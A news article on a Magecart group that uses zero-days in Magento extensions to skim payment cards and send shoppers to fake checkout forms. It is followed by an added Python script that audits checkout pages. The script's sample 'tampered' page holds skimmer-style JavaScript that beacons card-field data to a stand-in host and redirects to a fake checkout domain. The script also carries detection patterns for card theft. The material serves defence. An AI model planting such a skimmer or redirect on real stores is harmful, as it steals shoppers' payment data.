Magic art cluster leverages zero-days in twenty Magento extensions

Hackers are abusing unpatched zero-day vulnerabilities in around twenty Magento extensions to plant payment card skimmers on online stores, according to Dutch security expert Willem de Groot. The researcher has been tracking this recent campaign but has so far identified only two of the twenty extensions that the hackers are targeting.

He is now asking the broader infosec and web development community for help in identifying the other eighteen extensions, so that he can notify their developers and have the zero-days fixed.

The researcher has listed a series of URL paths through which the hackers are exploiting the zero-days to gain a foothold on stores running the vulnerable extensions.

Webcooking_SimpleBundle Magento extension

Webcooking, the maker of the Webcooking_SimpleBundle Magento extension, one of the two extensions de Groot has already identified by name, shipped a fix within hours of the researcher reaching out. The second extension identified by name is TB Rewards, which was abandoned some months ago and which should be uninstalled from all stores because of the current security risk.

Hackers are creating fake Magento checkout forms:

The group using this collection of Magento extension zero-days is one of the groups tracked under the umbrella term Magecart. Magecart attacks have been going on for the past three years, but they have intensified and grown bolder this year, after some attacks hit larger entities such as Ticketmaster, British Airways, and Newegg.

While initially there was just one Magecart group behind the attacks, many different actors are now active using the same technique.

De Groot says the group behind the Magento extension zero-days campaign is also quite clever. The hackers are not content with injecting a script into hacked stores that steals payment card data from checkout forms, as most other Magecart groups do.

In cases where the store owner handles card payments through external providers (such as PayPal or Stripe), or does not handle card payments at all, this group redirects store visitors to a fake checkout form that it created for exactly this purpose.
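As an added defender-side illustration (this is not code from the article, from de Groot, or from any Magento project), the script below audits the HTML of a store's checkout page for the two behaviours described above: an injected script that reads card fields and sends data off-site, and a form, meta refresh, or script redirect that sends the shopper to a checkout page on a foreign host. The store hostname, the script allow-list, and both sample pages are constructed assumptions, not material from the article.

```python
"""Constructed example: audit a Magento checkout page's markup for
skimmer-style injections and off-site checkout redirects.
Hostnames, allow-list and sample pages are hypothetical."""
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

STORE_HOST = "shop.example"  # assumption: the store's own hostname
# assumption: script hosts the store legitimately loads from
ALLOWED_SCRIPT_HOSTS = {STORE_HOST, "js.stripe.com", "www.paypal.com"}

CARD_FIELD = re.compile(r"(cc_number|card[_-]?number|cvv|cvc|expir)", re.I)
NETWORK_CALL = re.compile(r"(fetch\(|XMLHttpRequest|\.src\s*=|Image\(|sendBeacon)")
REDIRECT = re.compile(r"(location\.(href|replace)|window\.location)")
URL_IN_JS = re.compile(r"""https?://[^\s'"]+""")


def _foreign_host(url: str):
    """Return the hostname if the URL points off the store, else None."""
    host = urlparse(url).hostname
    return host if host and host != STORE_HOST else None


class CheckoutAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings: List[str] = []
        self._in_script = False
        self._script_buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src:
                host = urlparse(src).hostname
                if host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(f"external script from unknown host: {host}")
        elif tag == "form":
            host = _foreign_host(a.get("action") or "")
            if host:
                self.findings.append(f"form posts to foreign host: {host}")
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content") or "", re.I)
            if m and _foreign_host(m.group(1)):
                self.findings.append(
                    f"meta refresh redirects to foreign host: {_foreign_host(m.group(1))}")

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        body = "".join(self._script_buf)
        # A script that both touches card fields and makes a network call
        # matches the "steal data from the checkout form" behaviour.
        if CARD_FIELD.search(body) and NETWORK_CALL.search(body):
            self.findings.append("inline script reads card fields and makes a network call")
        # A script that redirects to another host matches the "fake checkout" behaviour.
        if REDIRECT.search(body):
            for url in URL_IN_JS.findall(body):
                host = _foreign_host(url)
                if host:
                    self.findings.append(f"inline script redirects to foreign host: {host}")


def audit_checkout_html(html: str) -> List[str]:
    """Feed a checkout page through the auditor and return its findings."""
    p = CheckoutAuditor()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages (not real store markup).
CLEAN_PAGE = """<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script>var form = document.getElementById('co-payment-form');</script>
</head><body>
<form action="/checkout/onepage/savePayment" method="post"></form>
</body></html>"""

TAMPERED_PAGE = """<html><head>
<script src="https://cdn.example.net/jquery.min.js"></script>
<script>
document.getElementById('cc_number').onchange = function () {
  new Image().src = 'https://stats.example.net/c?d=' + this.value.length;
};
if (document.title.indexOf('Checkout') >= 0) {
  window.location.href = 'https://checkout-secure.example.net/pay';
}
</script>
</head><body>
<form action="/checkout/onepage/savePayment" method="post"></form>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, audit_checkout_html(page))
```

The allow-list is the important design choice: a skimmer or redirect only stands out against a known-good inventory of the hosts and script bodies a checkout page is supposed to carry, so the check belongs in a scheduled integrity job that compares the live page against a stored baseline rather than in a one-off run.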